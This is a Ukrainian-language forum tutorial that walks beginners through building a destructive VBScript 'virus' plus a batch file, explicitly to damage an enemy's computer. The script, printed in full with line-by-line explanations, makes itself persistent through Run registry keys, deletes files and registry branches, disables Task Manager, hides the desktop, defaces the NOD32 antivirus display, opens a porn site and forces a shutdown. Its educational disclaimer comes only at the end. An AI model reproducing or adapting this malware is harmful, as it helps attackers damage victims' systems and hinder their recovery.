Всім ку. У кожного хакера в певний момент виникає бажання нашкодити кому-небудь і написати свій власний вірус, але незнання якої-небудь мови робить це неможливим і новачкові доводиться шукати вже готові продукти. Сьогодні я постараюся допомогти новачкам здійснити їхню мрію за допомогою вже готових функцій. Свого роду надати їм основні «детальки», необхідні для складання вірусу. Попереджаю заздалегідь дана стаття буде корисна лише новачкам. Сподіваюся вона допоможе їм не тільки почистити комп свого недруга )), але і хоч саму малість вивчити мову Visual Basic Script, і, можливо, навіть самим написати який-небудь скриптик ( наприклад вискакує віконце з повідомленням про те що комп був атакований сервер компанії Apple XP і почистити системні каталоги )). Тим же, хто вважає, що віруси на VBS це дитячі пустощі можу сказати, що у таких вірусів є переваги — пишуться вони буквально за кілька хвилин, і мають дуже малий розмір (близько 10 кб ). Кожну строчку коду я спробую якомога зрозуміліше розкрити. Отже, поїхали.

Створюємо файл virus.vbs, відкриваємо блокнот ( в якості редактора можу порекомендувати notepad++, який можна завантажити тут ) і починаємо писати наш шкідливий скрипт:

Set Shell = CreateObject(«Wscript.Shell»)
Set Application = CreateObject(«Shell.Application»)
Set FileSystemObject = CreateObject(«scripting.filesystemobject»)
Set File = FileSystemObject.GetFile(WScript.ScriptFullName)
On Error Resume Next
File.Copy («c:windowsSystem32virus.vbs»)
Shell.RegWrite «HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunvirus», «C:WINDOWSSYSTEM32virus.vbs»
Shell.RegWrite «HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunservicesvirus», «C:WINDOWSSYSTEM32virus.vbs»
Shell.RegWrite «HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunoncevirus», «C:WINDOWSSYSTEM32virus.vbs»
Shell.popup «message»,5, «heading», 0+16
FileSystemObject.deletefolder«C:example»,True
FileSystemObject.deletefile«C:example.txt»,True
Shell.RegWrite «HKEY_CURRENT_USERSoftwareMicrosoftwindowscurrentversionpoliciessystemdisabletaskmgr», 1, «REG_DWORD»
Shell.RegWrite «HKEY_CURRENT_USERSoftwaremIRCLicense», «blabla»
Shell.RegWrite «HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionname», «hacked by ваш нік ;)))»
Shell.RegDelete «HKEY_CURRENT_USERexample»
Shell.RegWrite «HKEY_CURRENT_USERSoftwareMicrosoftwindowscurrentversionpoliciesexplorernodesktop», 1, «REG_DWORD»
Application.MinimizeAll
InternerExplorer.Visible = True
InternerExplorer.Navigate «porno.ru/»

Тепер розберемо по порядку кожну строчку:

Set Shell = CreateObject(«Wscript.Shell») ‘з цього моменту починається VB скрипт

Set Application = CreateObject(«Shell.Application») ‘дозволяємо додатки

Set FileSystemObject = CreateObject(«scripting.filesystemobject») ‘якщо в скрипті присутній код використання ФС (aka файлової системи) то необхідно розв’язати цю функцію перед початком її виконання

Set File = FileSystemObject.GetFile(WScript.ScriptFullName) ‘дозволяємо роботу з файлами (копіювання, переміщення і т. д.)

On Error Resume Next ‘дуже важлива функція — пропуск помилок (якщо якогось файлу/папки не виявиться те станеться помилка в скрипті і всі наступні функції не будуть виконані, після цієї функції після виникаючих помилок наступні функції будуть виконуватися як ні в чому не бувало)

File.Copy («c:windowsSystem32virus.vbs») ‘створюємо файл virus.vbs в директорії c:windowsSystem32, який містить той же код, що і цей (коротше даний файл копіюється туди)

Shell.RegWrite «HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunvirus», «C:WINDOWSSYSTEM32virus.vbs» ‘прописуємо тільки що створений файл в автозавантаження через реєстр в новий строковий параметр «virus» розташований тут — HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrun

Shell.RegWrite «HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunservicesvirus», «C:WINDOWSSYSTEM32virus.vbs» ‘прописуємо тільки що створений файл в автозавантаження через реєстр в новий строковий параметр «virus» розташований тут — HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunservices

Shell.RegWrite «HKEY_LOCAL_MACHINESoftwareMicrosoftwindowscurrentversionrunoncevirus», «C:WINDOWSSYSTEM32virus.vbs» ‘якщо прописати наш файл тільки тут, то вірус після перезавантаження запуститься тільки один раз, але!!! коли він буде запускатися в ньому буде присутній рядок, яка знову пропише його знову таки в цю директорію — і так після кожного ребут він все одно буде запускатися. (можеш вибрати з всіх трьох способів автозавантаження тільки один, на випадок якщо юзер раптом випадково наткнеться на одну з цих записів у реєстрі)

Shell.popup «message»,5, «heading», 0+16 ‘виводимо повідомлення з заголовком «heading» і самим повідомленням «message» та 0+16=помилка(можна замінити на 0+64(значок i), 0+48(значок !), 0+32(значок ?) чи 0+0(без значка)) і встановлюємо час показу мессаги в 5 сек.(якщо поставити 0 час показу буде необмеженим) цю стрічку можна перемістити в кінець скрипта, тоді повідомлення буде виводитися після відпрацювання скрипта. Замість «message» ти можеш підставити будь-який текст. А що це буде за текст — це вже залежить від твоєї фантазії.

FileSystemObject.deletefolder«C:example»,True ‘видаляємо папку на диску C example

FileSystemObject.deletefile«C:example.txt»,True ‘видаляємо файл example.txt на диску C
‘зміни реєстру (всі смаколики які можуть використовувати вірі, нам не перерахувати):

Shell.RegWrite «HKEY_CURRENT_USERSoftwareMicrosoftwindowscurrentversionpoliciessystemdisabletaskmgr», 1, «REG_DWORD» ‘відключаємо ctrl+alt+del а точніше забороняємо запуск taskmgr aka диспетчер завдань windows

Shell.RegWrite «HKEY_CURRENT_USERSoftwaremIRCLicense», «blabla» ‘якщо у юзера зарегана mIRC можна зробити подляночку — нехай зарегает ще раз:) Для цього змінюємо серійник на blabla 🙂 Ти можеш використовувати цю функцію для будь-яких інших змін значень реєстру, для цього замість «HKEY_CURRENT_USERSoftwaremIRCLicense» прописувати шлях до цікавлячого параметра, а замість «blabla» нове значення.

Shell.RegWrite «HKEY_LOCAL_MACHINESOFTWAREESETESET SecurityCurrentVersionInfoEditionname», «hacked by ваш нік ;)))» ‘у головному вікні антивірусу NOD32 після слів ESET NOD32 Antivirus з’явиться напис Hacked by «ваш нік» непогано, так? :)))

Shell.RegDelete «HKEY_CURRENT_USERexample» ‘видаляємо гілку реєстру HKEY_CURRENT_USERexample

‘і на останок робимо наступне:
Shell.RegWrite «HKEY_CURRENT_USERSoftwareMicrosoftwindowscurrentversionpoliciesexplorernodesktop», 1, «REG_DWORD» ‘видаляємо все з робочого столу

Application.MinimizeAll ‘свертываем всі вікна

InternerExplorer.Visible = True
InternerExplorer.Navigate «porno.ru/» ‘переходимо на порно сайт щоб хоч якось заспокоїти юзера якого тепер не солодко доведеться.

Так, з *.vbs начебто розібралися, а як же юзер який залишився наодинці з… як би це сказати м’якше, загалом щоб він не дуже збудився від усього щойно побаченого, обмежимо йому час перегляду до 120 секунд (2 хвилин :)). Для цього створимо файл virus.bat і впишемо в нього сдедующую команду:

shutdown -s -f -t 120 -c «chuvak, chtoby ty ne perevozbudilsja, companija MiCrO$ofT ogranichila vremja prosmotra dannogo sajta do 2 хвилин, posle chego vy otpravytes v rebut»

А щоб не вилазила некрасива консоль напишемо перед цією командою наступне:

@echo off

Джойним два файлика і… загалом це твоя справа для яких цілей ти їх будеш використовувати, але я рекомендую видалити їх, так сказати від гріха подалі. На останок скажу, що стаття написана виключно в ознайомлювальних цілях і не в якихось інших. Загалом не роби дурниць!!! краще подумай куди б можна пристосувати дані команди щоб від них користь була. Удачі, юний хацкер.